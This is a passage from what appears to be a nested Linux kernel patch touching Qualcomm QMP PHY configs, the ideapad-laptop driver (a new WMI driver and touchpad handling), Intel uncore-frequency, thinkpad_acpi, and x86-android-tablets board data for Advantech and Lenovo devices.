++	.swing_hbr_rbr		= &qmp_dp_v3_voltage_swing_hbr_rbr,
++	.pre_emphasis_hbr_rbr	= &qmp_dp_v3_pre_emphasis_hbr_rbr,
++	.swing_hbr3_hbr2	= &qmp_dp_v3_voltage_swing_hbr3_hbr2,
++	.pre_emphasis_hbr3_hbr2 = &qmp_dp_v3_pre_emphasis_hbr3_hbr2,
++
++	.clk_list		= qmp_v3_phy_clk_l,
++	.num_clks		= ARRAY_SIZE(qmp_v3_phy_clk_l),
++	.reset_list		= msm8996_usb3phy_reset_l,
++	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
++	.vreg_list		= qmp_phy_vreg_l,
++	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
++	.regs			= qmp_v3_usb3phy_regs_layout,
++
++	.dp_aux_init = qcom_qmp_v3_phy_dp_aux_init,
++	.configure_dp_tx = qcom_qmp_v3_phy_configure_dp_tx,
++	.configure_dp_phy = qcom_qmp_v3_phy_configure_dp_phy,
++	.calibrate_dp_phy = qcom_qmp_v3_dp_phy_calibrate,
++};
++
+ static const struct qmp_phy_combo_cfg sdm845_usb3dpphy_cfg = {
+ 	.usb_cfg                = &sdm845_usb3phy_cfg,
+-	.dp_cfg                 = &sc7180_dpphy_cfg,
++	.dp_cfg                 = &sdm845_dpphy_cfg,
+ };
+ 
+ static const struct qmp_phy_cfg sm8150_usb3phy_cfg = {
+@@ -1184,8 +1221,8 @@ static const struct qmp_phy_cfg sc8180x_dpphy_cfg = {
+ 
+ 	.clk_list		= qmp_v3_phy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(qmp_v3_phy_clk_l),
+-	.reset_list		= sc7180_usb3phy_reset_l,
+-	.num_resets		= ARRAY_SIZE(sc7180_usb3phy_reset_l),
++	.reset_list		= msm8996_usb3phy_reset_l,
++	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+@@ -1328,8 +1365,8 @@ static const struct qmp_phy_cfg sm8250_dpphy_cfg = {
+ 	.swing_hbr3_hbr2	= &qmp_dp_v3_voltage_swing_hbr3_hbr2,
+ 	.pre_emphasis_hbr3_hbr2 = &qmp_dp_v3_pre_emphasis_hbr3_hbr2,
+ 
+-	.clk_list		= qmp_v4_phy_clk_l,
+-	.num_clks		= ARRAY_SIZE(qmp_v4_phy_clk_l),
++	.clk_list		= qmp_v4_sm8250_usbphy_clk_l,
++	.num_clks		= ARRAY_SIZE(qmp_v4_sm8250_usbphy_clk_l),
+ 	.reset_list		= msm8996_usb3phy_reset_l,
+ 	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
+ 	.vreg_list		= qmp_phy_vreg_l,
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index 3ea8fc6a9ca36..fc3d47a759443 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -30,6 +30,7 @@
+ #include <linux/seq_file.h>
+ #include <linux/sysfs.h>
+ #include <linux/types.h>
++#include <linux/wmi.h>
+ 
+ #include <acpi/video.h>
+ 
+@@ -37,20 +38,23 @@
+ 
+ #define IDEAPAD_RFKILL_DEV_NUM	3
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-static const char *const ideapad_wmi_fnesc_events[] = {
+-	"26CAB2E5-5CF1-46AE-AAC3-4A12B6BA50E6", /* Yoga 3 */
+-	"56322276-8493-4CE8-A783-98C991274F5E", /* Yoga 700 */
+-	"8FC0DE0C-B4E4-43FD-B0F3-8871711C1294", /* Legion 5 */
+-};
+-#endif
+-
+ enum {
+ 	CFG_CAP_BT_BIT       = 16,
+ 	CFG_CAP_3G_BIT       = 17,
+ 	CFG_CAP_WIFI_BIT     = 18,
+ 	CFG_CAP_CAM_BIT      = 19,
+-	CFG_CAP_TOUCHPAD_BIT = 30,
++
++	/*
++	 * These are OnScreenDisplay support bits that can be useful to determine
++	 * whether a hotkey exists/should show OSD. But they aren't particularly
++	 * meaningful since they were introduced later, i.e. 2010 IdeaPads
++	 * don't have these, but they still have had OSD for hotkeys.
++	 */
++	CFG_OSD_NUMLK_BIT    = 27,
++	CFG_OSD_CAPSLK_BIT   = 28,
++	CFG_OSD_MICMUTE_BIT  = 29,
++	CFG_OSD_TOUCHPAD_BIT = 30,
++	CFG_OSD_CAM_BIT      = 31,
+ };
+ 
+ enum {
+@@ -130,7 +134,7 @@ struct ideapad_private {
+ 	struct ideapad_dytc_priv *dytc;
+ 	struct dentry *debug;
+ 	unsigned long cfg;
+-	const char *fnesc_guid;
++	unsigned long r_touchpad_val;
+ 	struct {
+ 		bool conservation_mode    : 1;
+ 		bool dytc                 : 1;
+@@ -140,6 +144,7 @@ struct ideapad_private {
+ 		bool hw_rfkill_switch     : 1;
+ 		bool kbd_bl               : 1;
+ 		bool touchpad_ctrl_via_ec : 1;
++		bool ctrl_ps2_aux_port    : 1;
+ 		bool usb_charging         : 1;
+ 	} features;
+ 	struct {
+@@ -171,6 +176,48 @@ MODULE_PARM_DESC(set_fn_lock_led,
+ 	"Enable driver based updates of the fn-lock LED on fn-lock changes. "
+ 	"If you need this please report this to: platform-driver-x86@vger.kernel.org");
+ 
++static bool ctrl_ps2_aux_port;
++module_param(ctrl_ps2_aux_port, bool, 0444);
++MODULE_PARM_DESC(ctrl_ps2_aux_port,
++	"Enable driver based PS/2 aux port en-/dis-abling on touchpad on/off toggle. "
++	"If you need this please report this to: platform-driver-x86@vger.kernel.org");
++
++/*
++ * shared data
++ */
++
++static struct ideapad_private *ideapad_shared;
++static DEFINE_MUTEX(ideapad_shared_mutex);
++
++static int ideapad_shared_init(struct ideapad_private *priv)
++{
++	int ret;
++
++	mutex_lock(&ideapad_shared_mutex);
++
++	if (!ideapad_shared) {
++		ideapad_shared = priv;
++		ret = 0;
++	} else {
++		dev_warn(&priv->adev->dev, "found multiple platform devices\n");
++		ret = -EINVAL;
++	}
++
++	mutex_unlock(&ideapad_shared_mutex);
++
++	return ret;
++}
++
++static void ideapad_shared_exit(struct ideapad_private *priv)
++{
++	mutex_lock(&ideapad_shared_mutex);
++
++	if (ideapad_shared == priv)
++		ideapad_shared = NULL;
++
++	mutex_unlock(&ideapad_shared_mutex);
++}
++
+ /*
+  * ACPI Helpers
+  */
+@@ -386,8 +433,19 @@ static int debugfs_cfg_show(struct seq_file *s, void *data)
+ 		seq_puts(s, " wifi");
+ 	if (test_bit(CFG_CAP_CAM_BIT, &priv->cfg))
+ 		seq_puts(s, " camera");
+-	if (test_bit(CFG_CAP_TOUCHPAD_BIT, &priv->cfg))
++	seq_puts(s, "\n");
++
++	seq_puts(s, "OSD support:");
++	if (test_bit(CFG_OSD_NUMLK_BIT, &priv->cfg))
++		seq_puts(s, " num-lock");
++	if (test_bit(CFG_OSD_CAPSLK_BIT, &priv->cfg))
++		seq_puts(s, " caps-lock");
++	if (test_bit(CFG_OSD_MICMUTE_BIT, &priv->cfg))
++		seq_puts(s, " mic-mute");
++	if (test_bit(CFG_OSD_TOUCHPAD_BIT, &priv->cfg))
+ 		seq_puts(s, " touchpad");
++	if (test_bit(CFG_OSD_CAM_BIT, &priv->cfg))
++		seq_puts(s, " camera");
+ 	seq_puts(s, "\n");
+ 
+ 	seq_puts(s, "Graphics: ");
+@@ -593,6 +651,8 @@ static ssize_t touchpad_show(struct device *dev,
+ 	if (err)
+ 		return err;
+ 
++	priv->r_touchpad_val = result;
++
+ 	return sysfs_emit(buf, "%d\n", !!result);
+ }
+ 
+@@ -612,6 +672,8 @@ static ssize_t touchpad_store(struct device *dev,
+ 	if (err)
+ 		return err;
+ 
++	priv->r_touchpad_val = state;
++
+ 	return count;
+ }
+ 
+@@ -680,8 +742,7 @@ static umode_t ideapad_is_visible(struct kobject *kobj,
+ 	else if (attr == &dev_attr_fn_lock.attr)
+ 		supported = priv->features.fn_lock;
+ 	else if (attr == &dev_attr_touchpad.attr)
+-		supported = priv->features.touchpad_ctrl_via_ec &&
+-			    test_bit(CFG_CAP_TOUCHPAD_BIT, &priv->cfg);
++		supported = priv->features.touchpad_ctrl_via_ec;
+ 	else if (attr == &dev_attr_usb_charging.attr)
+ 		supported = priv->features.usb_charging;
+ 
+@@ -1089,6 +1150,8 @@ static void ideapad_sysfs_exit(struct ideapad_private *priv)
+ /*
+  * input device
+  */
++#define IDEAPAD_WMI_KEY 0x100
++
+ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,   6, { KEY_SWITCHVIDEOMODE } },
+ 	{ KE_KEY,   7, { KEY_CAMERA } },
+@@ -1101,7 +1164,30 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,  65, { KEY_PROG4 } },
+ 	{ KE_KEY,  66, { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY,  67, { KEY_TOUCHPAD_ON } },
++	{ KE_KEY,  68, { KEY_TOUCHPAD_TOGGLE } },
+ 	{ KE_KEY, 128, { KEY_ESC } },
++
++	/*
++	 * WMI keys
++	 */
++
++	/* FnLock (handled by the firmware) */
++	{ KE_IGNORE,	0x02 | IDEAPAD_WMI_KEY },
++	/* Esc (handled by the firmware) */
++	{ KE_IGNORE,	0x03 | IDEAPAD_WMI_KEY },
++	/* Customizable Lenovo Hotkey ("star" with 'S' inside) */
++	{ KE_KEY,	0x01 | IDEAPAD_WMI_KEY, { KEY_FAVORITES } },
++	/* Dark mode toggle */
++	{ KE_KEY,	0x13 | IDEAPAD_WMI_KEY, { KEY_PROG1 } },
++	/* Sound profile switch */
++	{ KE_KEY,	0x12 | IDEAPAD_WMI_KEY, { KEY_PROG2 } },
++	/* Lenovo Virtual Background application */
++	{ KE_KEY,	0x28 | IDEAPAD_WMI_KEY, { KEY_PROG3 } },
++	/* Lenovo Support */
++	{ KE_KEY,	0x27 | IDEAPAD_WMI_KEY, { KEY_HELP } },
++	/* Refresh Rate Toggle */
++	{ KE_KEY,	0x0a | IDEAPAD_WMI_KEY, { KEY_DISPLAYTOGGLE } },
++
+ 	{ KE_END },
+ };
+ 
+@@ -1414,26 +1500,41 @@ static void ideapad_kbd_bl_exit(struct ideapad_private *priv)
+ /*
+  * module init/exit
+  */
+-static void ideapad_sync_touchpad_state(struct ideapad_private *priv)
++static void ideapad_sync_touchpad_state(struct ideapad_private *priv, bool send_events)
+ {
+ 	unsigned long value;
++	unsigned char param;
++	int ret;
+ 
+-	if (!priv->features.touchpad_ctrl_via_ec)
++	/* Without reading from EC touchpad LED doesn't switch state */
++	ret = read_ec_data(priv->adev->handle, VPCCMD_R_TOUCHPAD, &value);
++	if (ret)
+ 		return;
+ 
+-	/* Without reading from EC touchpad LED doesn't switch state */
+-	if (!read_ec_data(priv->adev->handle, VPCCMD_R_TOUCHPAD, &value)) {
+-		unsigned char param;
++	/*
++	 * Some IdeaPads don't really turn off touchpad - they only
++	 * switch the LED state. We (de)activate KBC AUX port to turn
++	 * touchpad off and on. We send KEY_TOUCHPAD_OFF and
++	 * KEY_TOUCHPAD_ON to not to get out of sync with LED
++	 */
++	if (priv->features.ctrl_ps2_aux_port)
++		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
++
++	if (send_events) {
+ 		/*
+-		 * Some IdeaPads don't really turn off touchpad - they only
+-		 * switch the LED state. We (de)activate KBC AUX port to turn
+-		 * touchpad off and on. We send KEY_TOUCHPAD_OFF and
+-		 * KEY_TOUCHPAD_ON to not to get out of sync with LED
++		 * On older models the EC controls the touchpad and toggles it
++		 * on/off itself, in this case we report KEY_TOUCHPAD_ON/_OFF.
++		 * If the EC did not toggle, report KEY_TOUCHPAD_TOGGLE.
+ 		 */
+-		i8042_command(&param, value ? I8042_CMD_AUX_ENABLE : I8042_CMD_AUX_DISABLE);
+-		ideapad_input_report(priv, value ? 67 : 66);
+-		sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
++		if (value != priv->r_touchpad_val) {
++			ideapad_input_report(priv, value ? 67 : 66);
++			sysfs_notify(&priv->platform_device->dev.kobj, NULL, "touchpad");
++		} else {
++			ideapad_input_report(priv, 68);
++		}
+ 	}
++
++	priv->r_touchpad_val = value;
+ }
+ 
+ static void ideapad_acpi_notify(acpi_handle handle, u32 event, void *data)
+@@ -1474,7 +1575,7 @@ static void ideapad_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 			ideapad_sync_rfk_state(priv);
+ 			break;
+ 		case 5:
+-			ideapad_sync_touchpad_state(priv);
++			ideapad_sync_touchpad_state(priv, true);
+ 			break;
+ 		case 4:
+ 			ideapad_backlight_notify_brightness(priv);
+@@ -1505,33 +1606,6 @@ static void ideapad_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 	}
+ }
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-static void ideapad_wmi_notify(u32 value, void *context)
+-{
+-	struct ideapad_private *priv = context;
+-	unsigned long result;
+-
+-	switch (value) {
+-	case 128:
+-		ideapad_input_report(priv, value);
+-		break;
+-	case 208:
+-		if (!priv->features.set_fn_lock_led)
+-			break;
+-
+-		if (!eval_hals(priv->adev->handle, &result)) {
+-			bool state = test_bit(HALS_FNLOCK_STATE_BIT, &result);
+-
+-			exec_sals(priv->adev->handle, state ? SALS_FNLOCK_ON : SALS_FNLOCK_OFF);
+-		}
+-		break;
+-	default:
+-		dev_info(&priv->platform_device->dev,
+-			 "Unknown WMI event: %u\n", value);
+-	}
+-}
+-#endif
+-
+ /* On some models we need to call exec_sals(SALS_FNLOCK_ON/OFF) to set the LED */
+ static const struct dmi_system_id set_fn_lock_led_list[] = {
+ 	{
+@@ -1563,6 +1637,23 @@ static const struct dmi_system_id hw_rfkill_list[] = {
+ 	{}
+ };
+ 
++/*
++ * On some models the EC toggles the touchpad muted LED on touchpad toggle
++ * hotkey presses, but the EC does not actually disable the touchpad itself.
++ * On these models the driver needs to explicitly enable/disable the i8042
++ * (PS/2) aux port.
++ */
++static const struct dmi_system_id ctrl_ps2_aux_port_list[] = {
++	{
++	/* Lenovo Ideapad Z570 */
++	.matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Ideapad Z570"),
++		},
++	},
++	{}
++};
++
+ static const struct dmi_system_id no_touchpad_switch_list[] = {
+ 	{
+ 	.ident = "Lenovo Yoga 3 Pro 1370",
+@@ -1590,6 +1681,8 @@ static void ideapad_check_features(struct ideapad_private *priv)
+ 		set_fn_lock_led || dmi_check_system(set_fn_lock_led_list);
+ 	priv->features.hw_rfkill_switch =
+ 		hw_rfkill_switch || dmi_check_system(hw_rfkill_list);
++	priv->features.ctrl_ps2_aux_port =
++		ctrl_ps2_aux_port || dmi_check_system(ctrl_ps2_aux_port_list);
+ 
+ 	/* Most ideapads with ELAN0634 touchpad don't use EC touchpad switch */
+ 	if (acpi_dev_present("ELAN0634", NULL, -1))
+@@ -1622,6 +1715,118 @@ static void ideapad_check_features(struct ideapad_private *priv)
+ 	}
+ }
+ 
++#if IS_ENABLED(CONFIG_ACPI_WMI)
++/*
++ * WMI driver
++ */
++enum ideapad_wmi_event_type {
++	IDEAPAD_WMI_EVENT_ESC,
++	IDEAPAD_WMI_EVENT_FN_KEYS,
++};
++
++struct ideapad_wmi_private {
++	enum ideapad_wmi_event_type event;
++};
++
++static int ideapad_wmi_probe(struct wmi_device *wdev, const void *context)
++{
++	struct ideapad_wmi_private *wpriv;
++
++	wpriv = devm_kzalloc(&wdev->dev, sizeof(*wpriv), GFP_KERNEL);
++	if (!wpriv)
++		return -ENOMEM;
++
++	*wpriv = *(const struct ideapad_wmi_private *)context;
++
++	dev_set_drvdata(&wdev->dev, wpriv);
++	return 0;
++}
++
++static void ideapad_wmi_notify(struct wmi_device *wdev, union acpi_object *data)
++{
++	struct ideapad_wmi_private *wpriv = dev_get_drvdata(&wdev->dev);
++	struct ideapad_private *priv;
++	unsigned long result;
++
++	mutex_lock(&ideapad_shared_mutex);
++
++	priv = ideapad_shared;
++	if (!priv)
++		goto unlock;
++
++	switch (wpriv->event) {
++	case IDEAPAD_WMI_EVENT_ESC:
++		ideapad_input_report(priv, 128);
++		break;
++	case IDEAPAD_WMI_EVENT_FN_KEYS:
++		if (priv->features.set_fn_lock_led &&
++		    !eval_hals(priv->adev->handle, &result)) {
++			bool state = test_bit(HALS_FNLOCK_STATE_BIT, &result);
++
++			exec_sals(priv->adev->handle, state ? SALS_FNLOCK_ON : SALS_FNLOCK_OFF);
++		}
++
++		if (data->type != ACPI_TYPE_INTEGER) {
++			dev_warn(&wdev->dev,
++				 "WMI event data is not an integer\n");
++			break;
++		}
++
++		dev_dbg(&wdev->dev, "WMI fn-key event: 0x%llx\n",
++			data->integer.value);
++
++		ideapad_input_report(priv,
++				     data->integer.value | IDEAPAD_WMI_KEY);
++
++		break;
++	}
++unlock:
++	mutex_unlock(&ideapad_shared_mutex);
++}
++
++static const struct ideapad_wmi_private ideapad_wmi_context_esc = {
++	.event = IDEAPAD_WMI_EVENT_ESC
++};
++
++static const struct ideapad_wmi_private ideapad_wmi_context_fn_keys = {
++	.event = IDEAPAD_WMI_EVENT_FN_KEYS
++};
++
++static const struct wmi_device_id ideapad_wmi_ids[] = {
++	{ "26CAB2E5-5CF1-46AE-AAC3-4A12B6BA50E6", &ideapad_wmi_context_esc }, /* Yoga 3 */
++	{ "56322276-8493-4CE8-A783-98C991274F5E", &ideapad_wmi_context_esc }, /* Yoga 700 */
++	{ "8FC0DE0C-B4E4-43FD-B0F3-8871711C1294", &ideapad_wmi_context_fn_keys }, /* Legion 5 */
++	{},
++};
++MODULE_DEVICE_TABLE(wmi, ideapad_wmi_ids);
++
++static struct wmi_driver ideapad_wmi_driver = {
++	.driver = {
++		.name = "ideapad_wmi",
++	},
++	.id_table = ideapad_wmi_ids,
++	.probe = ideapad_wmi_probe,
++	.notify = ideapad_wmi_notify,
++};
++
++static int ideapad_wmi_driver_register(void)
++{
++	return wmi_driver_register(&ideapad_wmi_driver);
++}
++
++static void ideapad_wmi_driver_unregister(void)
++{
++	return wmi_driver_unregister(&ideapad_wmi_driver);
++}
++
++#else
++static inline int ideapad_wmi_driver_register(void) { return 0; }
++static inline void ideapad_wmi_driver_unregister(void) { }
++#endif
++
++/*
++ * ACPI driver
++ */
+ static int ideapad_acpi_add(struct platform_device *pdev)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&pdev->dev);
+@@ -1670,16 +1875,12 @@ static int ideapad_acpi_add(struct platform_device *pdev)
+ 	if (!priv->features.hw_rfkill_switch)
+ 		write_ec_cmd(priv->adev->handle, VPCCMD_W_RF, 1);
+ 
+-	/* The same for Touchpad */
+-	if (!priv->features.touchpad_ctrl_via_ec)
+-		write_ec_cmd(priv->adev->handle, VPCCMD_W_TOUCHPAD, 1);
+-
+ 	for (i = 0; i < IDEAPAD_RFKILL_DEV_NUM; i++)
+ 		if (test_bit(ideapad_rfk_data[i].cfgbit, &priv->cfg))
+ 			ideapad_register_rfkill(priv, i);
+ 
+ 	ideapad_sync_rfk_state(priv);
+-	ideapad_sync_touchpad_state(priv);
++	ideapad_sync_touchpad_state(priv, false);
+ 
+ 	err = ideapad_dytc_profile_init(priv);
+ 	if (err) {
+@@ -1703,30 +1904,16 @@ static int ideapad_acpi_add(struct platform_device *pdev)
+ 		goto notification_failed;
+ 	}
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-	for (i = 0; i < ARRAY_SIZE(ideapad_wmi_fnesc_events); i++) {
+-		status = wmi_install_notify_handler(ideapad_wmi_fnesc_events[i],
+-						    ideapad_wmi_notify, priv);
+-		if (ACPI_SUCCESS(status)) {
+-			priv->fnesc_guid = ideapad_wmi_fnesc_events[i];
+-			break;
+-		}
+-	}
+-
+-	if (ACPI_FAILURE(status) && status != AE_NOT_EXIST) {
+-		err = -EIO;
+-		goto notification_failed_wmi;
+-	}
+-#endif
++	err = ideapad_shared_init(priv);
++	if (err)
++		goto shared_init_failed;
+ 
+ 	return 0;
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-notification_failed_wmi:
++shared_init_failed:
+ 	acpi_remove_notify_handler(priv->adev->handle,
+ 				   ACPI_DEVICE_NOTIFY,
+ 				   ideapad_acpi_notify);
+-#endif
+ 
+ notification_failed:
+ 	ideapad_backlight_exit(priv);
+@@ -1752,10 +1939,7 @@ static int ideapad_acpi_remove(struct platform_device *pdev)
+ 	struct ideapad_private *priv = dev_get_drvdata(&pdev->dev);
+ 	int i;
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-	if (priv->fnesc_guid)
+-		wmi_remove_notify_handler(priv->fnesc_guid);
+-#endif
++	ideapad_shared_exit(priv);
+ 
+ 	acpi_remove_notify_handler(priv->adev->handle,
+ 				   ACPI_DEVICE_NOTIFY,
+@@ -1781,7 +1965,7 @@ static int ideapad_acpi_resume(struct device *dev)
+ 	struct ideapad_private *priv = dev_get_drvdata(dev);
+ 
+ 	ideapad_sync_rfk_state(priv);
+-	ideapad_sync_touchpad_state(priv);
++	ideapad_sync_touchpad_state(priv, false);
+ 
+ 	if (priv->dytc)
+ 		dytc_profile_refresh(priv);
+@@ -1807,7 +1991,30 @@ static struct platform_driver ideapad_acpi_driver = {
+ 	},
+ };
+ 
+-module_platform_driver(ideapad_acpi_driver);
++static int __init ideapad_laptop_init(void)
++{
++	int err;
++
++	err = ideapad_wmi_driver_register();
++	if (err)
++		return err;
++
++	err = platform_driver_register(&ideapad_acpi_driver);
++	if (err) {
++		ideapad_wmi_driver_unregister();
++		return err;
++	}
++
++	return 0;
++}
++module_init(ideapad_laptop_init)
++
++static void __exit ideapad_laptop_exit(void)
++{
++	ideapad_wmi_driver_unregister();
++	platform_driver_unregister(&ideapad_acpi_driver);
++}
++module_exit(ideapad_laptop_exit)
+ 
+ MODULE_AUTHOR("David Woodhouse <dwmw2@infradead.org>");
+ MODULE_DESCRIPTION("IdeaPad ACPI Extras");
+diff --git a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c
+index 8f9c571d72578..00ac7e381441a 100644
+--- a/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c
++++ b/drivers/platform/x86/intel/uncore-frequency/uncore-frequency.c
+@@ -203,6 +203,7 @@ static const struct x86_cpu_id intel_uncore_cpu_ids[] = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_X,	NULL),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ICELAKE_D,	NULL),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X, NULL),
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(x86cpu, intel_uncore_cpu_ids);
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 8476dfef4e626..a1d91736a03b8 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -5572,6 +5572,7 @@ static enum led_brightness light_sysfs_get(struct led_classdev *led_cdev)
+ static struct tpacpi_led_classdev tpacpi_led_thinklight = {
+ 	.led_classdev = {
+ 		.name		= "tpacpi::thinklight",
++		.max_brightness	= 1,
+ 		.brightness_set_blocking = &light_sysfs_set,
+ 		.brightness_get	= &light_sysfs_get,
+ 	}
+diff --git a/drivers/platform/x86/x86-android-tablets.c b/drivers/platform/x86/x86-android-tablets.c
+index 4acd6fa8d43b8..123a4618db55f 100644
+--- a/drivers/platform/x86/x86-android-tablets.c
++++ b/drivers/platform/x86/x86-android-tablets.c
+@@ -5,7 +5,7 @@
+  * devices typically have a bunch of things hardcoded, rather than specified
+  * in their DSDT.
+  *
+- * Copyright (C) 2021 Hans de Goede <hdegoede@redhat.com>
++ * Copyright (C) 2021-2022 Hans de Goede <hdegoede@redhat.com>
+  */
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+@@ -265,6 +265,56 @@ static struct gpiod_lookup_table int3496_gpo2_pin22_gpios = {
+ 	},
+ };
+ 
++/*
++ * Advantech MICA-071
++ * This is a standard Windows tablet, but it has an extra "quick launch" button
++ * which is not described in the ACPI tables in anyway.
++ * Use the x86-android-tablets infra to create a gpio-button device for this.
++ */
++static struct gpio_keys_button advantech_mica_071_button = {
++	.code = KEY_PROG1,
++	/* .gpio gets filled in by advantech_mica_071_init() */
++	.active_low = true,
++	.desc = "prog1_key",
++	.type = EV_KEY,
++	.wakeup = false,
++	.debounce_interval = 50,
++};
++
++static const struct gpio_keys_platform_data advantech_mica_071_button_pdata __initconst = {
++	.buttons = &advantech_mica_071_button,
++	.nbuttons = 1,
++	.name = "prog1_key",
++};
++
++static const struct platform_device_info advantech_mica_071_pdevs[] __initconst = {
++	{
++		.name = "gpio-keys",
++		.id = PLATFORM_DEVID_AUTO,
++		.data = &advantech_mica_071_button_pdata,
++		.size_data = sizeof(advantech_mica_071_button_pdata),
++	},
++};
++
++static int __init advantech_mica_071_init(void)
++{
++	struct gpio_desc *gpiod;
++	int ret;
++
++	ret = x86_android_tablet_get_gpiod("INT33FC:00", 2, &gpiod);
++	if (ret < 0)
++		return ret;
++	advantech_mica_071_button.gpio = desc_to_gpio(gpiod);
++
++	return 0;
++}
++
++static const struct x86_dev_info advantech_mica_071_info __initconst = {
++	.pdev_info = advantech_mica_071_pdevs,
++	.pdev_count = ARRAY_SIZE(advantech_mica_071_pdevs),
++	.init = advantech_mica_071_init,
++};
++
+ /* Asus ME176C and TF103C tablets shared data */
+ static struct gpio_keys_button asus_me176c_tf103c_lid = {
+ 	.code = SW_LID,
+@@ -987,6 +1037,212 @@ static void lenovo_yoga_tab2_830_1050_exit(void)
+ 	}
+ }
+ 
++/* Lenovo Yoga Tab 3 Pro YT3-X90F */
++
++/*
++ * There are 2 batteries, with 2 bq27500 fuel-gauges and 2 bq25892 chargers,
++ * "bq25890-charger-1" is instantiated from: drivers/i2c/busses/i2c-cht-wc.c.
++ */
++static const char * const lenovo_yt3_bq25892_0_suppliers[] = { "cht_wcove_pwrsrc" };
++static const char * const bq25890_1_psy[] = { "bq25890-charger-1" };
++
++static const struct property_entry fg_bq25890_1_supply_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("supplied-from", bq25890_1_psy),
++	{ }
++};
++
++static const struct software_node fg_bq25890_1_supply_node = {
++	.properties = fg_bq25890_1_supply_props,
++};
++
++/* bq25892 charger settings for the flat lipo battery behind the screen */
++static const struct property_entry lenovo_yt3_bq25892_0_props[] = {
++	PROPERTY_ENTRY_STRING_ARRAY("supplied-from", lenovo_yt3_bq25892_0_suppliers),
++	PROPERTY_ENTRY_STRING("linux,power-supply-name", "bq25892-second-chrg"),
++	PROPERTY_ENTRY_U32("linux,iinlim-percentage", 40),
++	PROPERTY_ENTRY_BOOL("linux,skip-reset"),
++	/* Values taken from Android Factory Image */
++	PROPERTY_ENTRY_U32("ti,charge-current", 2048000),
++	PROPERTY_ENTRY_U32("ti,battery-regulation-voltage", 4352000),
++	PROPERTY_ENTRY_U32("ti,termination-current", 128000),
++	PROPERTY_ENTRY_U32("ti,precharge-current", 128000),
++	PROPERTY_ENTRY_U32("ti,minimum-sys-voltage", 3700000),
++	PROPERTY_ENTRY_U32("ti,boost-voltage", 4998000),
++	PROPERTY_ENTRY_U32("ti,boost-max-current", 500000),
++	PROPERTY_ENTRY_BOOL("ti,use-ilim-pin"),
++	{ }
++};
++
++static const struct software_node lenovo_yt3_bq25892_0_node = {
++	.properties = lenovo_yt3_bq25892_0_props,
++};
++
++static const struct x86_i2c_client_info lenovo_yt3_i2c_clients[] __initconst = {
++	{
++		/* bq27500 fuel-gauge for the flat lipo battery behind the screen */
++		.board_info = {
++			.type = "bq27500",
++			.addr = 0x55,
++			.dev_name = "bq27500_0",
++			.swnode = &fg_bq25890_supply_node,
++		},
++		.adapter_path = "\\_SB_.PCI0.I2C1",
++	}, {
++		/* bq25892 charger for the flat lipo battery behind the screen */
++		.board_info = {
++			.type = "bq25892",
++			.addr = 0x6b,
++			.dev_name = "bq25892_0",
++			.swnode = &lenovo_yt3_bq25892_0_node,
++		},
++		.adapter_path = "\\_SB_.PCI0.I2C1",
++		.irq_data = {
++			.type = X86_ACPI_IRQ_TYPE_GPIOINT,
++			.chip = "INT33FF:01",
++			.index = 5,
++			.trigger = ACPI_EDGE_SENSITIVE,
++			.polarity = ACPI_ACTIVE_LOW,
++		},
++	}, {
++		/* bq27500 fuel-gauge for the round li-ion cells in the hinge */
++		.board_info = {
++			.type = "bq27500",
++			.addr = 0x55,
++			.dev_name = "bq27500_1",
++			.swnode = &fg_bq25890_1_supply_node,
++		},
++		.adapter_path = "\\_SB_.PCI0.I2C2",
++	}
++};
++
++static int __init lenovo_yt3_init(void)
++{
++	struct gpio_desc *gpiod;
++	int ret;
++
++	/*
++	 * The "bq25892_0" charger IC has its /CE (Charge-Enable) and OTG pins
++	 * connected to GPIOs, rather then having them hardwired to the correct
++	 * values as is normally done.
++	 *
++	 * The bq25890_charger driver controls these through I2C, but this only
++	 * works if not overridden by the pins. Set these pins here:
++	 * 1. Set /CE to 0 to allow charging.
++	 * 2. Set OTG to 0 disable V5 boost output since the 5V boost output of
++	 *    the main "bq25892_1" charger is used when necessary.
++	 */
++
++	/* /CE pin */
++	ret = x86_android_tablet_get_gpiod("INT33FF:02", 22, &gpiod);
++	if (ret < 0)
++		return ret;
++
